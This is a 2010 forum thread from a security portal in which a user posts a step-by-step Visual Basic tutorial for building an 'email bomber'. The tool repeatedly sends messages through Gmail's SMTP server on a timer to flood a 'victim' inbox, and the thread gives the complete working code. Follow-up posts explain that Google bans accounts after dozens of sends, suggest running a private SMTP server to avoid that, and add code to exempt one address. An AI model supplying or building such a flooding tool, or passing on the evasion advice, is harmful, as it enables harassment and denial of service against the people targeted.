Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 77
Members: 0
Total: 77
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Visual Basic -> How to make an email Bomber [Tutorial][with screenies]
Post new topicReply to topic View previous topic :: View next topic
How to make an email Bomber [Tutorial][with screenies]
PostPosted: Sat Jan 09, 2010 2:09 am Reply with quote
eXhAiL
Regular user
Regular user
Joined: Jan 09, 2010
Posts: 8
Location: Unknown




OK today im going to show you how to make an email bomber in Visual Basic 2008.
Feel free to ask any questions on this.
What you will need:-
1. Microsoft Visual Basic 2008
2. A Slight Bit Of Common Sense.

You Can Download Microsoft Visual Basic 2008 HERE

1)Open up Visual Basic 2008
2)Create a New Windows Form Application and name it anything you want for example I have named it Email Application – See Below For More Information. Then Click OK.

3)Click the window that looks like a new window. Go to the settings on the right scroll down to the bottom until you find Text. edit this To What you want to appear on the top of your application for Example I Have Called Mine Email Application – See Below For More Information. (Red box means what text is being Edited)

4)Now it is time for you too design and make the Application. Add 3 Buttons named Start-Stop and Exit You Can Change The Names By Clicking them and then start typing.
5)Now Add 5 Text-boxes Named 1.Google-mail Username 2.Google-mail password 3.Victims Email 4.Email subject 5.Email message (Make the 5th Text-Box multiline)
6)Now Add One timer.(Do NOT edit anything in this)
7)Add A Label click it and type the Number 0 . – For more information on [4,5,6&7] See Below.
8)If you have followed It so far accurately It should look something like this.

9)OK. We have now done the fun bit designing. Now it is time to code it all so it will all work.
10)Double Click The start button and type in
Code:
Timer1.start()

11)Double Click The Stop button and type in
Code:
Timer1.stop()

12)Double Click The Exit button and type in
Code:
End

13)Go right to the top of the coding page and above “Public Class” Type in
Code:
Imports System.Net.Mail

14)If you have followed it correctly so far it should look something like this

15)Now Double click the Timer and type in
Code:
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress(TextBox1.Text)
MyMailMessage.To.Add(TextBox3.Text)
MyMailMessage.Subject = (TextBox4.Text)
MyMailMessage.Body = TextBox5.Text
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text)
SMTPServer.EnableSsl = True
Label1.Text = Val(Label1.Text + 1)
SMTPServer.Send(MyMailMessage)

16)Now once you have done that all the code should look like this

17)Now Press F5 or click the green Arrow on the top toolbar to Debug and run/test.
18)If it all went ok and you typed in all the correct codes it should look like something similar to this

19)This only works with googlemail as it uses there SMTP Server. This is nothing special hwo ever it does send mass emails to the victim and google does banna ccounts that are caught spamming like this so you may be required to make a fair few accounts.
20)This is very basic as you can see but you can mess around with styles and jazz it up a bit for your liking.

All Credits Goto me and microsoft
Microsoft for visual basic 2008
Me = eXhAiL for writing this tutorial all screenshots were taken form my pc

If you have any questions feel free to ask them i will try to answear them
Thanks.
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Sat Jan 09, 2010 6:36 pm Reply with quote
HashManiac
Regular user
Regular user
Joined: May 13, 2009
Posts: 17




Its Really Simple and Usefull
View user's profile Send private message
PostPosted: Sat Jan 09, 2010 9:35 pm Reply with quote
eXhAiL
Regular user
Regular user
Joined: Jan 09, 2010
Posts: 8
Location: Unknown




HashManiac wrote:
Its Really Simple and Usefull


When I'm writing my tutorials I try to include everything i can so no questions are asked.

I'm glad you found it useful and easy to follow.
As you can see i only done a basic one you can change with the style and even add it so you can use other smtp servers. Smile


---------------------------------------------
eXhAiL
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Sat Jan 09, 2010 9:57 pm Reply with quote
HashManiac
Regular user
Regular user
Joined: May 13, 2009
Posts: 17




I have a question.

What about 501 errors.. ?

When i reach +70, Program giving 501 Auth error.

Can i fix it ?
View user's profile Send private message
PostPosted: Sat Jan 09, 2010 10:26 pm Reply with quote
eXhAiL
Regular user
Regular user
Joined: Jan 09, 2010
Posts: 8
Location: Unknown




HashManiac wrote:
I have a question.

What about 501 errors.. ?

When i reach +70, Program giving 501 Auth error.

Can i fix it ?


It means google has just banned your account from sending emails through the smtp server . the only way from stopping that is using your own smtp server from your own domain.
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Sun Jan 10, 2010 6:50 am Reply with quote
HashManiac
Regular user
Regular user
Joined: May 13, 2009
Posts: 17




Damn you Right ...
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 6:33 pm Reply with quote
HashManiac
Regular user
Regular user
Joined: May 13, 2009
Posts: 17




I have a question too..

I want to give this program to my friends.. But i'm afrading of what if they attack me ?

Can we cancel an e-mail for attack

Like i dont want to making attack for dasdasd@hotmail.com

Waiting for reply Smile
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 9:07 pm Reply with quote
eXhAiL
Regular user
Regular user
Joined: Jan 09, 2010
Posts: 8
Location: Unknown




HashManiac wrote:
I have a question too..

I want to give this program to my friends.. But i'm afrading of what if they attack me ?

Can we cancel an e-mail for attack

Like i dont want to making attack for dasdasd@hotmail.com

Waiting for reply Smile


unfortunately there isn't a way of blocking these attacks unless you know which email they are going to be sent from.

View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Mon Jan 11, 2010 4:09 pm Reply with quote
HashManiac
Regular user
Regular user
Joined: May 13, 2009
Posts: 17




No there is way Exhail Smile

I solved it in 1 minute Smile

Add this codes to Victim Mail Text Box

( Here is TextBox3 )

Code:
Private Sub TextBox3_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox3.TextChanged
If TextBox3.Text = "Blocked Mail@example.com" Then
End
End If
End Sub
End Class


By the way.. I'm not a programmer Smile Just Think Smile
View user's profile Send private message
PostPosted: Mon Jan 11, 2010 6:02 pm Reply with quote
eXhAiL
Regular user
Regular user
Joined: Jan 09, 2010
Posts: 8
Location: Unknown




HashManiac wrote:
No there is way Exhail Smile

I solved it in 1 minute Smile

Add this codes to Victim Mail Text Box

( Here is TextBox3 )

Code:
Private Sub TextBox3_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox3.TextChanged
If TextBox3.Text = "Blocked Mail@example.com" Then
End
End If
End Sub
End Class


By the way.. I'm not a programmer Smile Just Think Smile


I totally forgot about , that , nice to see you looked it up Smile
View user's profile Send private message Visit poster's website MSN Messenger
How to make an email Bomber [Tutorial][with screenies]
www.waraxe.us Forum Index -> Visual Basic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds